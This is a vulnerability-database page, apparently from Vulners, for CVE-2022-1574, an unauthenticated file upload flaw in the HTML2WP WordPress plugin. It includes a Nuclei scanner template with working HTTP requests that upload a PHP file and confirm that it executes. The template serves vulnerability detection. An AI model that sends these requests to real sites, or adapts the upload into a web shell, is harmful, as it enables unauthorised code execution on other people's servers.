| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2022-1574 | 27 Jun 202209:15 | – | attackerkb | |
| CVE-2022-1574 | 20 Nov 202521:02 | – | circl | |
| WordPress plugin HTML2WP 代码问题漏洞 | 27 Jun 202200:00 | – | cnnvd | |
| WordPress HTML2WP plugin arbitrary file upload vulnerability | 30 Jun 202200:00 | – | cnvd | |
| CVE-2022-1574 | 27 Jun 202208:57 | – | cve | |
| CVE-2022-1574 HTML2WP <= 1.0.0 - Unauthenticated Arbitrary File Upload | 27 Jun 202208:57 | – | cvelist | |
| CVE-2022-1574 | 27 Jun 202209:15 | – | nvd | |
| WordPress HTML2WP plugin <= 1.0.0 - Unauthenticated Arbitrary File Upload vulnerability | 2 Jun 202200:00 | – | patchstack | |
| Cross site request forgery (csrf) | 27 Jun 202209:15 | – | prion | |
| PT-2022-13973 · WordPress · Html2Wp | 27 Jun 202200:00 | – | ptsecurity |
id: CVE-2022-1574
info:
name: WordPress HTML2WP <=1.0.0 - Arbitrary File Upload
author: theamanrawat
severity: critical
description: |
WordPress HTML2WP plugin through 1.0.0 contains an arbitrary file upload vulnerability. The plugin does not perform authorization and CSRF checks when importing files and does not validate them. As a result, an attacker can upload arbitrary files on the remote server.
impact: |
An attacker can upload malicious files to the server, leading to remote code execution or unauthorized access.
remediation: |
Update to the latest version of the plugin or remove it if not needed.
reference:
- https://wpscan.com/vulnerability/c36d0ea8-bf5c-4af9-bd3d-911eb02adc14
- https://wordpress.org/plugins/html2wp/
- https://nvd.nist.gov/vuln/detail/CVE-2022-1574
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1574
cwe-id: CWE-352
epss-score: 0.11866
epss-percentile: 0.95574
cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: html2wp_project
product: html2wp
framework: wordpress
tags: cve,cve2022,wp-plugin,wp,fileupload,unauth,wpscan,wordpress,intrusive,html2wp,html2wp_project,vuln,vkev
http:
- raw:
- |
POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1
Host: {{Hostname}}
Content-Length: 253
Content-Type: multipart/form-data; boundary=---------------------------7816508136577551742878603990
Connection: close
-----------------------------7816508136577551742878603990
Content-Disposition: form-data; name="local_importing[]"; filename="{{randstr}}.php"
Content-Type: text/html
<?php
echo "File Upload success";
-----------------------------7816508136577551742878603990--
- |
GET /wp-content/uploads/html2wp/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "status_code_1 == 302"
- "status_code_2 == 200"
- "contains(body_2, 'File Upload success')"
condition: and
# digest: 4a0a0047304502203f12deed90d8172d67ecf6f3cb60962ea580ff6800246a1f562ced363651242b022100e85a8210397135791e7618fede62573c028498cfc7d9f3da4f32d750c4d041cb:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation